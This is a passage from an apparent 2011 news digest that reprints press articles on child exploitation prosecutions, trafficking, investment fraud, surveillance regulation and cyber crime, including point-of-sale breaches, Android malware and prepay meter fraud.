But last year the Centre received intelligence from the non-governmental organisation Action Pour Les Enfants (APLE), which works with CEOP through its International Child Protection Network. The information suggested Harland had surfaced in Cambodia and had offended against two young girls.

Harland was arrested there on May 20 and UK officers deployed to Cambodia after calls for assistance from the country's police.

The CEOP team worked with their counterparts and shared critical intelligence. They also implemented a child protection strategy to ensure the two victims received safeguarding and support, assisted with the forensic examination of computer equipment and helped to prepare the prosecution case.

Griffin, from Wales, ran a number of orphanages in Siem Reap. He left Britain in 2006 and set up the Cambodia Orphan Fund before being arrested in October last year following joint investigations between the Cambodian authorities, CEOP and APLE.

Speaking during a visit to Cambodia, Peter Davies, the Lead Police Officer who heads up CEOP, said he is satisfied at the securing of two major results.

He added: "Two convictions in two days shows that this crime will not be tolerated no matter where in the world you think you can go to escape capture. These are major convictions and show the severity in which we all view this crime.

"I am here seeing at first hand the work we have been doing building an International Child Protection Network - all dedicated to forming partnerships, sharing expertise and working collaboratively to bring such offenders to justice."

(16th March 2011)


CHILD TRAFFICKING IN SCOTLAND "IS HIDDEN SCANDAL"
(Guardian, dated 13th March 2011 author Billy Briggs)
www.guardian.co.uk
Category : child abuse

 

At least 80 children have been trafficked to Scotland to face sexual exploitation and other forms of abuse including forced labour, benefit fraud and domestic servitude, a report published today says.

The findings conclude that these cases are the tip of an iceberg, with many more child victims who have been sold, stolen and transported thousands of miles remaining unidentified.

The report - Scotland: a safe place for child traffickers? - criticises police for failing to secure a single conviction for trafficking, and the authorities for their poor response to young victims' needs.

In November, it emerged that a young Nigerian girl had been trafficked to Scotland, held prisoner and gang-raped. Her case was just one of several documented by the Scottish Refugee Council.

Some of the children identified have been forced to work in cannabis factories and private homes and pose as dependents for benefit scams. They came from a number of countries including China, Sudan, Somalia, Kenya, the Democratic Republic of the Congo and Vietnam. The youngest was 14 years old.

Child trafficking has long been considered an issue of border control, the study said, leading to those who have been trafficked being regarded as part of a problem, rather than as victims.

Scotland's commissioner for children and young people, Tam Baillie, and the Centre for Rural Childhood at Perth College University of the Highlands and Islands produced the report, and made a number of urgent recommendations.

They called on the UK government to review the national referral mechanism to strengthen co-operation between government agencies, and to appoint an independent human trafficking rapporteur accountable to the UK parliament.

The authors recommended the Scottish government should ensure adequate resources are available to tackle the problem and act as a lead for local authorities to ensure that nationally agreed procedures are followed consistently at a local level.

Baillie said: "When children are raped or exploited as slaves in households or businesses in Scotland it becomes our national scandal. When we fail to notice, fail to pick up the signs and fail to act on children's trauma, it demands action. I hope this report, the first of its kind in Scotland, will take the issue out into the open and result in action and change for child victims of trafficking."

Professor Rebecca Wallace, director of the centre for rural childhood at Perth College UHI, said the report's findings address the previous lack of an evidence base regarding child trafficking in Scotland. She added the study was an opportunity to "harness the very evident willingness of professionals encountered during the research to improve the identification and treatment of children trafficked into and within Scotland".

(16th March 2011)


 

UK PENSIONERS CONNED IN £100m FRAUD
(Guardian, dated 11th March 2011 author David Batty)
www.guardian.co.uk
Category : fraud

A multimillionaire faces up to 20 years in a US jail after admitting he had conned thousands of British pensioners out of their life savings.

Richard Pope, 53, enjoyed fast cars, yachts and private jets paid for by the sale of fake shares to more than 2,300 victims by his international criminal gang. One victim alone lost more than £800,000, in what was estimated to be a £100m scam.

As Pope pleaded guilty to conspiracy at a Florida district court, British police said his cold criminality had left hundreds of people destitute, many of them retired people in the UK. Detective Superintendent Bob Wishart said: "He and the guys who did this are on a par with some of the most ruthless villains out there."

Wishart, part of the City of London police's economic crime directorate, had led the investigation in partnership with US homeland security investigation of Tampa and the US secret service.

"The [victims] did not deserve what they have got; they thought they were going to be able to look after their families for years to come with this," he said. "But instead many of them have ended up divorced, homeless, or have had to come out of retirement and get jobs. For some of these people there will be no closure. This has scarred them for life. The psychological effects cannot be underestimated. It is the worst case I have dealt with."

Pope's gang stole the identity, history and shareholder base of dormant, publicly trading companies in America before cold-calling investors using "high pressure and misleading sales techniques", in what is known as a "boiler room" scam.

Pope helped sell fake shares and options to unsuspecting investors between 2004 and 2008 through operations in Spain.

One of four businesses in the scam was Mobilestream, a worthless entity sold as an up and coming company. Websites and glossy brochures were used to lend credibility to fake investment opportunities.

"Many of the [victims] were left penniless, some even destitute," an investigating officer said. "The stolen money was funnelled off into US bank accounts, where it was reinvested by financiers and enjoyed by the gang leaders."

While the fraud in the indictment totalled £80m, detectives believed the actual total was well in excess of £100m.

Boiler room scams are thought to cost the UK around £200m a year.

Pope spent two years on the run before his arrest at an undisclosed location in Spain, police said. He was charged in March 2009 by US authorities with six other defendants, two of them also Britons: Paul Gunter and Simon Odoni. The other defendants await trial.

Pope agreed to pay more than £26m in restitution, and to help prosecutors and testify against his co-conspirators, the Tampa Tribune reported. US district judge Richard Lazzara postponed his sentencing until completion of the case.

(16th March 2011)



GOVERNMENT PROPOSES NEW PRIVACY WATCHDOG TO MONITOR CCTV
(Courtesy of : Computer Active, dated 9th March 2011 author Dinah Greek)
www.computeractive.co.uk
Category : surveillance

 

The Government is asking the public for its views on proposals to create a new privacy watchdog to monitor surveillance technologies.

In a Home Office consultation document on a Code of Practice relating to surveillance cameras put forward as part of the Protection of Freedoms Bill, a Surveillance Camera Commissioner (SCC) would enforce a new code of practice on the use of technologies such as CCTV and Automatic Number Plate Recognition (ANPR).

The proposals suggest that the remit of the new SCC could include ruling whether it is necessary to install surveillance camera equipment, as well as safeguards and privacy. Initially, according to the Home Office, its remit would only cover systems that are under the control of local authorities and police forces.

But eventually other organisations may fall under its control. The Information Commissioner's Office (ICO) current CCTV code of practice, which provides guidance and advice for CCTV users on how to comply with the Data Protection Act, could be merged into the new code at some point.

"That is an area we are consulting on," a Home Office representative said.

The Government admitted that there would, at least initially, be "a strong overlap of areas of interest" between the new Commissioner and the ICO. This has led the ICO to express concerns, saying it could cause "conflict" and "confusion".

In the evidence submitted by the Office of Fair Trading to the Public Bills Committee on the Protection of Freedoms Bill, the privacy watchdog said: "In order to have an effective, transparent and consistent regulatory framework, it is essential that all the commissioners who have a role in overseeing camera surveillance have clear and complementary roles.

"Otherwise there is a risk that regulation becomes fragmentary, confusing and contradictory, especially if commissioners take different approaches."

However, a Home Office representative said that although there is some regulatory control on the use of CCTV and ANPR, this is specific and therefore limited.

It said the growth in the use of these surveillance technologies had to balance the benefits they can provide against privacy issues.

Regulating CCTV usage "would restore public confidence" and "data protection" would remain under the ICO's remit, we were told.

"The Surveillance Camera Commissioner's role will be to promote, provide advice on and review the operation of the code, and he will be able to draw attention to any gaps in the code, or to make recommendations to ministers as he sees fit," said the Home Office.

However, Alex Hanff, campaign organiser for Privacy International, was not convinced.

"I have no great love for the ICO and don't think it does a good job in protecting people's privacy, but I don't see things changing with a new organisation," he said.

The Home Office said funds for the new organisation "would not exceed provision made for the current interim CCTV Regulator," which is currently up to £250,000 per annum. Forensic Science Regulator Andrew Rennison was appointed to this position in December 2009.

The public consultation on proposals to create a new privacy watchdog, which started on 1st March, will run for 12 weeks until 25th May and information on the proposed code of practice can be accessed on the Home Office website.


 

Additional Information

The proposed Bill doesn't just cover CCTV. The Protection of Freedoms Bill will cover a raft of privacy issues :

* brings in a new framework for police retention of fingerprints and DNA data, and requires schools to get parents' consent before processing children's biometric information.
* introduces a code of practice for surveillance camera systems and provides for judicial approval of certain surveillance activities by local authorities.
* provides for a code of practice to cover officials' powers of entry, with these powers being subject to review and repeal.
* outlaws wheel-clamping on private land.
* introduces a new regime for police stops and searches under the Terrorism Act 2000 and reduces the maximum pre-charge detention period under that Act from 28 to 14 days.
* restricts the scope of the 'vetting and barring' scheme for protecting vulnerable groups and makes changes to the system of criminal records checks.
* enables those with convictions for consensual sexual relations between men aged 16 or over (which have since been decriminalised) to apply to have them disregarded.
* extends Freedom of Information rights by requiring datasets to be available in a re-usable format.
* repeals provisions (never brought into force) which would have allowed trial without a jury in complex fraud cases.
* removes time restrictions on when marriage or civil partnership ceremonies may take place.

For details of the public consultation go to :

http://www.parliament.uk/business/news/2011/february/second-reading-of-protection-of-freedoms-bill/

(16th March 2011)


 

MASSIVE SURGE IN IPHONE MUGGINGS ON LONDON'S TRAINS
(Evening Standard, dated 10th March 2011 author Justin Davenport)
www.thisislondon.co.uk

Commuters were warned today to be on alert for robbers who are targeting people carrying iPhones on trains in London.

Detectives have released CCTV images of two robbery suspects after a series of phone snatches on trains and at stations.

A surge in robberies in the capital has been partly driven by the popularity of expensive gadgets such as iPhones, BlackBerries and iPads.

Experts say smart phones, particularly iPhones, are popular among muggers because they can easily be sold abroad for hundreds of pounds. Street robberies in London rose by more than eight per cent last year, and the number of times mobiles were stolen in muggings increased by 22 per cent.

The British Transport Police Robbery Squad is warning passengers to remain vigilant after phone snatches in south London.

Detectives have confirmed that the same two suspects have struck at least six times though they suspect they may have carried out more attacks.

Each time, the robbers use the same tactic of scouting for victims on trains or station platforms. If they spot someone on an iPhone they walk up and snatch it, using force if challenged.

Police say they are investigating robberies at Catford Bridge, West Dulwich, Mitcham Eastfields and Balham between Saturday January 1 and Thursday February 10.

Detective Constable Gary Bellinger said: "We believe the men pictured in the CCTV images have snatched phones from passengers on trains across south London on at least six occasions, and we are investigating whether they've been involved in any further incidents.

"Typically they walk through trains scouting for potential targets, namely passengers talking on their phones because they are more likely to be distracted.

"After singling out their victim they snatch the phone, using violence if they are met with any resistance, before making a quick escape while the train has stopped.

"We've made enquiries and followed up on a number of leads to try and get names for these men, but to no avail so far."

Police are urging people to take simple precautions such as being aware of people around you when using phones in public.

Detective Chief Inspector Martin Ford of the National Mobile Phone Crime Unit urged people to use the security features on smart phones.

He said: "Many smart phones have very high levels of security and people should be aware of this and use it to protect their phones and the information and data they carry on their phones these days."

Anyone with information about the robbery suspects should call British Transport Police on Freefone 0800 40 50 40 (quoting reference B10/LSA of 9/3/11) or ring Crimestoppers anonymously on 0800 555 111.

For the article and photos of suspects :

http://www.thisislondon.co.uk/standard/article-23930782-surge-in-iphone-muggings-on-londons-commuter-trains.do

For better quality photos of suspects :

http://www.lbc.co.uk/iphone-snatchers-on-south-london-trains-37245

(12th March 2011)




NEVER MIND THE PRODUCTS, EDUCATE THE USERS
(IDG News Service, dated 2nd March 2011 author Peter Sayer)
www.idg.com

 

If they could change one thing to improve IT security, the assembled experts on a panel at Cebit would better educate their users.

"Education is important: We're all too naïve," said Eddy Willems, global security officer for G Data Software, speaking in a panel session on security during the Cebit Global Conference, part of the Cebit trade show in Hanover, Germany, on Wednesday.

"People need to take security seriously. We can do a lot at a technological level, but if they choose a weak password, they are at risk," said Joachim Schaper, vice president of research at AGT Germany, which provides physical, as well as IT, security services.

Richard Marko, CEO of ESET, an antivirus software vendor based in Bratislava, Slovakia, would rather users kept their data where his desktop security products can see it: "I wish users would think twice before they decide what it is appropriate to put into the cloud," he said.

However, improved user education can only accomplish so much: IT systems developers also need to make systems simpler to use safely.

"If you want millions of people to use a service, it needs to be easy, without the need for them to install more software," said Georg Rau, senior vice president at Deutsche Post, another panellist.

But the obligation isn't only on customers to learn: it's also on suppliers to inform. Buyers can't make educated decisions about how to set up and run their IT infrastructures unless vendors supply them with the necessary information.

Nowhere is that more the case than in the market for cloud computing services, where vendors vaunt the fact that their customers don't need to know how things work.

"We need transparency from cloud computing providers. We should know how their systems are organized, and we should know about the people they hire," said Natalya Kaspersky, chairperson at Kaspersky Lab.

She wants to see more transparency in such services, and better standards for security practices, so that customers can evaluate service providers.

"If the level of security and transparency is very high, I may be willing to pay more. If I don't care about security, I can pay less. But I should have that choice," she said.

Schaper drew a comparison with the automobile industry, where manufacturers spend millions conducting crash tests to demonstrate the safety of their vehicles. Because the tests are standardized across the industry, the results can be compared: That's important, he said, because safety might be a decision factor when purchasing a car.

While the vendors of IT systems in general, and of security products and services in particular, do conduct tests of their products, these are not always directly comparable, Schaper warned. "If you go to other providers, they might have a different standard," he said. "It still needs a lot of work from vendors to make these tests transparent and standard."

The chairman of the panel session, Martin Gutberlet of analyst firm Gartner, came to the same conclusion.

"There's still a lot of work to do on standards and certification" of security practices, he said. But, he wondered, "Are we willing to pay for it?"

(12th March 2011)


 

CYBERCRIMINALS TARGETING POINT-OF-SALE DEVICES
(IDG News Service, dated 3rd March 2011 author Jeremy Kirk)
www.idg.com

Point-of-sale payment processing devices for credit and debit cards are proving to be rich targets for cybercriminals due to lax security controls, particularly among small businesses, according to a report from Trustwave.

Trustwave, which investigates payment card breaches for companies such as American Express, Visa and MasterCard, conducted 220 investigations worldwide involving data breaches in 2010. The vast majority of those cases came down to weaknesses in POS devices.

"Representing many targets and due to well-known vulnerabilities, POS systems continue to be the easiest method for criminals to obtain the data necessary to commit payment card fraud," according to Trustwave's Global Security Report 2011.

POS devices read the magnetic stripe on the back of a card that contains account information, which is then transmitted for payment processing.

Although there are rules for security controls that developers should use for the devices, such as the Payment Application Data Security standard (PA-DSS), Trustwave said that "these controls are rarely implemented properly."

Further, many small businesses rely on third-party integrators to support the POS devices. But those integrators often have poor security practices. In 87% of the breach cases it studied, the integrators make mistakes such as using default credentials in operating systems or with remote access systems, Trustwave said.

"In our experience, many POS integrators are often not skilled in security best practices, leaving their clients open for attack," the report said. "For instance, our investigations often uncover deficiencies in regards to basic security controls, such as the use of default passwords and single-factor remote access solutions."

POS devices are an attractive target for cybercriminals since the data they access from the cards is more complete, Trustwave said. For example, an attack against an e-commerce website may yield a credit card number and the card's expiration date -- information that can only be used in so-called card-not-present fraud, such as buying goods on a website that never sees the physical card or its magnetic strip.

But POS devices collect the full magnetic strip, which makes it possible, for example, to encode that information on a dummy card for use at an ATM machine or a retailer.

Retailers have been increasing their compliance with the Payment Card Industry Data Security Standard (PCI-DSS), a code of best practices created by the card industry. It forbids, for example, the storing of magnetic strip data on POS terminals and mandates the use of encryption.

But in 2010 Trustwave discovered new malware targeted at POS applications, one of which was capable of extracting that encrypted data.

"The POS-specific malware is the most sophisticated malware we have seen, and similar to the ATM malware we saw in 2009, as it requires deep knowledge about the workings of the POS application," Trustwave wrote.

Even though PCI-DSS is well established in North America and Europe, "these mandates are just beginning to take hold in other regions," Trustwave wrote. "For example, Latin America and Asia Pacific still lag behind other areas of the world in the identification and acknowledgement of a data breach, which adversely affects the global effort to combat attacker behavior."

Trustwave website : https://www.trustwave.com/

(12th March 2011)


 

FRENCH GOVERNMENT GIVES MORE DETAILS OF HACKING
(IDG News Service, dated 8th March 2011 author Peter Sayer)
www.idg.com

IDG News Service - The French National IT Systems Security Agency released further details of the recent attack on French government computers, saying they were targeted by cyberspies.

Around 150 IT staff spent the weekend on a massive cleanup operation to undo the effects of the attack on computers at the French Ministry of Economy, Finances and Industry, the security agency's director-general said Monday night.

The attack compromised around 150 of the ministry's 170,000 PCs, agency director-general Patrick Pailloux said at a press conference.

The attack began with a wave of e-mail messages with malware-laden attachments that exploited then-unknown or unprotected flaws in the software running on the ministry's PCs. The messages were addressed to ministry staff of all levels, and purported to come from colleagues or regular correspondents elsewhere, while the attachments appeared to relate to their work, Pailloux said.

When the attachments were opened, they installed Trojan horse software on the PCs. Under the control of the unidentified attackers, that software was then used to compromise other PCs, to send data out of the ministry hidden in other Internet traffic, and finally to cover up its activities.

The attackers had access to mailboxes and servers over the course of several weeks. It took the agency until last week to figure out what the Trojan horse was doing, and just how far it had spread, Pailloux said.

While attacks on other French government computers were made during this time, none of them appeared to have succeeded, he said.

The technical level and coordination of the attacks on the Finance Ministry show that the hackers were determined and organized professionals, he said.

After disconnecting the ministry from the Internet, it took 150 IT staff all weekend to clean up and strengthen security systems before bringing the Internet connection back up on Monday morning, Pailloux said.

Pailloux declined to comment on who might be behind the attack, although he did acknowledge that it resembled an attack on Canadian government IT systems last month. That attack was initially blamed on the Chinese, an accusation the Chinese swiftly denied.

French Budget Minister François Baroin said this latest attack was probably from outside France: "We have some leads, but at this stage it's impossible to confirm them," he said in a radio interview Monday morning.

There is no sign that personal tax files were targeted, Baroin said, something later confirmed by the security agency.

"What was targeted, it seems, was the organization of the G20 as, so it seems, happened during the organization of the previous G20," Baroin said.

The G20, or Group of 20, meetings bring together the finance ministers and central bank governors of 19 countries and the European Union. In addition to the E.U., the G20 members are Argentina, Australia, Brazil, Canada, China, France, Germany, India, Indonesia, Italy, Japan, Mexico, Russia, Saudi Arabia, South Africa, South Korea, Turkey, the U.K. and the U.S.

In October, news reports claimed that the G20 conference in Seoul was targeted by North Korean hackers.

The latest incident, Baroin said, shows that companies are not the only targets of economic espionage: It can also happen to states. "This is just one more incident, a confirmation that we, too, need to protect our IT systems," he said.

(12th March 2011)


 

VERIFONE SEEKS RECALL OF SQUARE CREDIT CARD READERS
(Computerworld, dated 9th March 2011 author Jaikumar Vijayan)
www.computerworld.com

In a highly unusual move, electronic payment vendor VeriFone Wednesday said it found a "gaping" security hole in a free plug-in mobile credit card reader from Square, a startup launched by Twitter founder Jack Dorsey.

In an open letter to "industry and consumers," VeriFone CEO Doug Bergeron called on Square to recall the devices because they pose a serious security threat to consumers.

Square, co-founded by Dorsey and Jim McKelvey in late 2009, offers a free device that can be plugged into the headphone jack of an iPhone, iPad or Android phone to instantly convert the device into a credit card reader.

Bergeron said Square's card readers don't encrypt cardholder data as a payment card is swiped through the device. The vulnerability would allow criminals to write and use applications that can download credit card data to a mobile phone.

In a YouTube video, Bergeron said it took less than an hour for VeriFone personnel to write an application that could be used to skim or steal unencrypted cardholder data as it's swiped through a Square card reader.

VeriFone has posted a sample skimming application for download by anyone who wants to verify how easy it would be to steal card data from a Square card reader. Bergeron said that VeriFone sent a similar app to Visa, MasterCard, American Express and the other payment card companies.

"If the industry allows Square and others to short-circuit security best practices, it will seriously jeopardize the integrity and security of the payment infrastructure," Bergeron said. Square did not respond to a request for comment on VeriFone's charges.

Square touts its card readers as devices that can easily be used by taxi drivers and seasonal market and street vendors to accept credit card payments. "You can even have your friend that owes you $20 pay you with their card, since their wallet always seems to be empty when you remind them," the company says in a note on its site.

Square currently accepts U.S.-issued MasterCard, Visa, American Express, and Discover cards and charges a flat 2.75% for all swiped transactions. Anyone can register for the service by simply providing Square with a physical address, a Social Security number and a U.S. bank account number.

Gartner analyst Avivah Litan said Square currently processes card transactions valued at between $2 million and $10 million each week. The company has set a goal of processing $1 billion in card transactions in 2011, Litan said.

The Square service was officially launched in October 2010 and claimed some 165,000 active accounts as of January, Litan said.

Paul Rasori, senior vice president of global marketing at VeriFone, today said the company decided to make its claims public because the number of free Square card readers in use continues to grow.

VeriFone sells a similar device and fears that consumers will abandon all such technology due to potential security problems, he said. "They have been sending out these card skimmers to anyone who asks for them," Rasori said. "They have created a huge problem. We felt compelled to nip it in the bud."

Rasori said that VeriFone's mobile card reader encrypts cardholder data the moment a card is swiped, keeping it safe from malicious applications created to steal card data.

He said that VeriFone did not formally notify Square about its security concerns prior to going public with them today. He contended that Square has known about this issue for some time.

Litan and others, though, faulted VeriFone's approach and said it was unusual for a technology vendor to disclose a security vulnerability publicly before giving the other a chance to respond.

"We don't see this very often. You can't help but wonder if this is all being driven by competitive worries," she said. "Square is a very unique payment system, and credit card brands are worried about all this innovation" and the threat it poses to traditional payment systems, she added.


 

Additional information

Square is a mobile payment services company launched by Twitter founder Jack Dorsey and Jim McKelvey in 2009. The company distributes a small, free dongle that people can stick into the headphone jacks of their iPhone, iPad or Android devices and start using instantly to accept credit card payments. The device reads the magnetic strip on credit cards. The service appears to be for the US only; looking at the security, I can understand why!


Further article on subject : http://cwonline.computerworld.com/t/7234030/753476122/374943/0/

Square website : https://squareup.com/

(12th March 2011)


 

MALWARE AD HITS LONDON STOCK EXCHANGE WEB SITE
(IDG News Service, dated 1st March 2011 author Robert McMillan)
www.idg.com

Visitors to the London Stock Exchange's Web site were hit with malicious ads over the weekend, designed to pop up fake security messages on their computers.

The culprit was an online advertisement that was somehow placed on the Unanimis ad network, which is used by the Web site, a London Stock Exchange spokeswoman said Monday. "We had an advert on the site that linked through to a third-party website that was hosting this malware," she said. She did not know how many people had been served the malicious ad.

The Stock Exchange's Web site itself was not compromised, and the ad was removed as soon as it was discovered on Sunday, she said.

Nevertheless, visitors to the site early Monday were greeted with browser warnings saying that londonstockexchange.com had been reported as an attack page. The warnings showed up in the Firefox, Chrome and Safari browsers, but were removed later in the day.

"The malware was a classic spoof antivirus program which used a software vulnerability to download and install native executable code," said Paul Mutton, a researcher with Web analytics firm Netcraft, who reported the issue on his personal blog.

The malware pops up a message on the victim's computer that reads "Warning! You're in danger! Your computer is infected with spyware." This is a common type of malicious program, called "rogue antivirus," which is designed to trick the user into paying for useless antivirus software. Typically the victim ends up handing money over to the scammers, but the malicious software doesn't really go away.

In an online chat, Mutton said he did not know what bug the hackers used to install their malware. He also said he couldn't discuss the incident further.

In a brief statement, Unanimis said it had found malware "which affected some advertisements on our network." Unanimis is owned by European telecommunications giant Orange France Telecom Group.

Security experts say that criminals have become adept at sneaking onto online ad networks in recent years. In December, Google's ad network was hit with a similar type of malware. That attack lasted for about five days, according to security vendor Armorize.

Computerworld's Gregg Keizer contributed to this story.

(12th March 2011)


 

 

HACKING ALERT ON GOOGLE PHONE
(Metro, dated 8th March 2011 author Fred Attewill)
www.metro.co.uk

New fears have been raised over the security of smartphones after Google was forced to admit that up to 260,000 handsets have been hacked.

The threat was exposed when Google had to activate a remote 'kill switch' to delete up to 58 free apps from phones running its Android software without users' permission.

The technology giant has now sent warnings to all customers who had downloaded malicious applications which could take control of their handsets and steal personal information.

Security expert Mikko Hypponen said the incident had exposed Google's lack of vetting of apps.

He told Metro: 'I do think Android phones are more vulnerable than any of the other major smartphones out there at the moment.'

Android software is used worldwide by phone manufacturers such as Samsung and HTC. Nearly 33 million handsets were shipped out of factories in the fourth quarter of last year, putting them ahead of Nokia's rival Symbian and more than double the number of Apple iPhones.

But Google has long been criticised for failing to match the scrutiny of its rivals, which vet apps made available for their phones.

The rogue apps, which included titles such as Magic Strobe Light, Photo Editor, Super Ringtone Maker, Super Guitar Solo, Color Blindness Test and Sexy Legs, were infected with a particularly sophisticated malware called DroidDream.

Apart from accessing personal data, it could have been used to send spam texts or call premium rate numbers - and owners would only have known when they were sent their phone bill.

Peter Pachal from PCMag.com said Google's quick response to the latest security alert was impressive.

He added: 'But going into my phone and erasing software - no matter how bad it may be - strikes me as a vaguely Orwellian thing to do.'

(8th March 2011)


 

NEW NET RULES SET TO MAKE COOKIES CRUMBLE
(BBC News, dated 8th March 2011)
www.bbc.co.uk/news/technology-12668552

The way websites track visitors and tailor ads to their behaviour is about to undergo a big shake-up.

From 25th May 2011, European laws dictate that "explicit consent" must be gathered from web users who are being tracked via text files called "cookies".

These files are widely used to help users navigate faster around sites they visit regularly.

Businesses are being urged to sort out how they get consent so they can keep on using cookies.

Track changes
 
The changes are demanded by the European e-Privacy directive which comes into force in the UK in late May.

The section of the directive dealing with cookies was drawn up in an attempt to protect privacy and, in particular, limit how much use could be made of behavioural advertising.

This form of marketing involves people being tracked across websites, with their behaviour used to create a profile that dictates the type of adverts they see.

As part of its work to comply with the directive, the IAB - an industry body that represents web ad firms - created a site that explains how behavioural advertising works and lets people opt out of it.

The directive demands that users be fully informed about the information being stored in cookies and told why they see particular adverts.

However, the directive is likely to have an impact on the more general use of cookies that remember login details and enable people to speed up their use of sites they visit regularly.

It could mean that after 25th May, users see many more pop-up windows and dialogue boxes asking them to let sites gather data.

Data delay
 
The exact steps that businesses have to go through to comply with the law and gain consent from customers and users are being drawn up by the Department for Culture, Media and Sport (DCMS).

A spokesman for the DCMS said that work on the regulations was "ongoing" but that the technical solutions would not be complete by 25th May.

In a statement, Ed Vaizey, minister for Culture, Communications and the Creative Industries, said he recognised that the delay would "cause uncertainty for businesses and consumers".

"Therefore we do not expect the Information Commissioner's Office (ICO) to take enforcement action in the short term against businesses and organisations as they work out how to address their use of cookies," he added.

Information Commissioner Christopher Graham said: "I cannot bark at the industry at the moment because I have not got the regulations."

However, Mr Graham stressed that the government's confession that the regulations will be delayed should not be a spur to inaction.

"My message is that this is not your 'get out of jail free' card," he said.

The response to complaints about firms that flout the directive will be viewed in light of what they have done to prepare for it, continued Mr Graham.

Businesses should be considering how they will communicate with customers to get consent and look at the technical steps that might make that process easier, he explained.

Early work by the ICO suggests that gathering consent by changing settings on browsers may not be sophisticated enough for the demands of the directive.

"They have to think seriously about this," said Mr Graham. "It's going to happen and it's the law."

(8th March 2011)


 

ELECTRICITY SCAM NETS CRIMINALS MILLIONS
(Sky News, dated 4th March 2011)
http://news.sky.com

Criminals are defrauding the UK energy industry out of electricity worth millions of pounds, a Sky News investigation has revealed.

An estimated 125,000 people have purchased illegal 'top-ups' for their meters from gangs offering electricity at half the price.

Prepay electricity meters work like pay-as-you-go phones. You purchase energy at newsagents and garages by topping-up a plastic 'key'. The key is then plugged into your meter and the amount is added to your account.

But last year hackers cracked the technology used to create engineer's keys that come with £50 credit. Cloned keys have been sold-on to gangs who are using them to top-up meters for £25 cash.

We were tipped-off about 'David', an Albanian operating the fraud in Tottenham. After inviting him to a flat in South London, we secretly filmed him topping-up our meter.

The operation took less than a minute and cost David nothing. We arranged a subsequent meeting with him to purchase the key for £2,000, but he became suspicious and did not keep the appointment.

Consumers purchasing electricity in this way could be caught the next time they top up lawfully. This is because energy suppliers can spot unusual patterns when the correct key isn't used. Anyone caught could end up being charged twice for their electricity.

Energy UK, the trade association for gas and electricity companies, estimates the fraud has cost them £10m in sales and that overall losses could rise to £30m after the impact of contacting customers and replacing meters is taken into account.

Director Christine McGourty warned anyone buying an illegal top-up to think again. "These people are criminals," she said. "To commit this crime they have to come into your home and you really don't want to be getting involved with people like that. We would urge people not to get involved. You're simply putting money in the pockets of criminals."

There are also concerns the cost of the fraud will hit consumers through higher energy bills.

Audrey Gallacher from Consumer Focus said: "All pre-pay meter customers are likely to feel the effects of this. Action to address the problem, whether through technological fixes or changing meters, will ultimately be borne by consumers."

Despite the fraud being operated in major UK towns and cities, there have been only 16 arrests so far.

(8th March 2011)


 

CYBER CRIME "AS SERIOUS AS TERRORISM"
(The Guardian, dated 2nd March 2011 author Shiv Malik)
www.guardian.co.uk

The UK's economy will suffer "profound effects" if the growing threat of cyber crime is not tackled, warns one of the UK's most senior police officers.

Janet Williams, Deputy Assistant Commissioner of the Metropolitan police and the Association of Chief Police Officers' lead on cyber crime, says online fraudsters and hackers will cause a fall in the value of shares, pensions and business investments if they are not stopped.

The government upgraded cyber crime to a tier one threat in October, putting it on the same level as international terrorism or a flu pandemic. It has set aside £650m to combat the threat.

Williams told the Guardian that £30m of the funding will be used to set up regional e-crime units which will more thoroughly police the "dark side" of the internet.

While larger companies can afford blanket protection from computer criminals, and the national infrastructure receives an "extremely good" protection service, Williams warns that smaller businesses, universities and individuals are still dangerously exposed to criminal rings from around the world looking to steal everything from cash and identities to intellectual property.

"We are very concerned at the extent and growth of cyber crime. It is getting to be an increasingly larger problem," said Williams. "The agencies policing this are bringing all of their skills and capacity to the table to fight this. If we don't, it will have such a profound effect on share prices, on investment, and on how much the government has to spend on pensions. It is big stuff."

A Cabinet Office report released two weeks ago and written in conjunction with private firm Detica, a subsidiary of weapons manufacturer BAE Systems, estimated cyber crime losses at £27bn.

Williams conceded there were real problems with collecting cyber crime data but she said £27bn was a conservative estimate of the losses.

She drew attention to the increasing youth of online fraudsters and her fears that e-criminals, including politically motivated hackers or 'hacktivists', may be too readily sucked into breaking the law because of a lack of human interaction.

An eight-month operation by the police service's central e-crime unit, codenamed Pagode, discovered in early 2010 that five British teenagers, including two females, were running the world's largest English-language website for selling stolen identities and credit card details.

The site, Gh0stMarket.net, could only be viewed as lines of computer commands mixed with 'text-speak' English. It had more than 8,000 members. Police estimated £16.2m of financial losses resulted from the 135,000 compromised card numbers found on the site.

Four of the gang were sentenced at Southwark crown court on Wednesday to jail terms of 18 months to five years.

Williams said: "I describe what these very young people were operating as a kind of supermarket for criminals. You had thousands of customers purchasing illicit goods, like packs of stolen identities and instructions for defrauding major organisations. So it was like they came with a shopping trolley in order to load up what they would like. And they got paid quite huge amounts of money for that service."

Williams described the teenagers running the Gh0stMarket site as very bright and very well educated but queried whether they were fully aware of their actions. "[Their age] is very concerning. I wonder whether they completely appreciate the impact of what they've done."

The e-crime unit, which Williams helped establish in 2008, was involved in last month's arrests of three teenagers and two 20-year-olds from the political group Anonymous.

Members of the group are known to have created and distributed computer software to take down the websites of multinational companies deemed as being hostile towards WikiLeaks.

Drawing a similarity between the Gh0stMarket gang and the Anonymous protesters, Williams said that in both cases the internet had created an "echo-chamber" where individual actions were not readily questioned. This made it easier for young people to get sucked into criminal behaviour.

"If we talk about Anonymous, people were downloading software voluntarily in order to attack another organisation. Allowing your computer to be used in that way is a criminal offence but I'm not sure that people realise that. I think a lot of people thought they were engaged in online protest and didn't appreciate the potential impact on them and the potential of what they were allowing their computers to be used for. If they would have had to have a face-to-face contact conversation, they would have questioned that more," said Williams.

"Human contact gives you thinking time and enables you to question what you are doing. But sometimes these websites almost act like an echo chamber. There is no testing of what you are seeing … It is not an intellectual exchange, it is just download. I think it is quite a dangerous thing."

Williams said she had seen no evidence that cyber criminals operating in different parts of the world were receiving state support.

"Sitting in this seat, I have read the secret intelligence but, in terms of the cyber investigations, very little we have seen has had that link. We have seen a great deal of criminal activity in Russia, Ukraine, eastern Europe but we have absolutely no evidence [that it is state sponsored]."

Williams said the e-crime unit was now returning £21 in "harm return" for every pound invested and had justified the multimillion-pound rise in funding by "proving its business case".

(9th March 2011)


 

CCTV AND ANPR USE UNDER SCRUTINY
(Central office of information, News Distribution Service, dated 2nd March 2011)
http://nds.coi.gov.uk/

A consultation on a new code of practice governing the use of CCTV and Automatic Number Plate Recognition (ANPR) systems has been launched, Crime Prevention Minister James Brokenshire announced yesterday.

Members of the public and operators of these systems can have their say on a range of proposals to make the use of this technology more proportionate and effective. The consultation is the first step towards establishing a formal Code of Practice as promised in the Government's Protection of Freedoms Bill.

The proposals include:

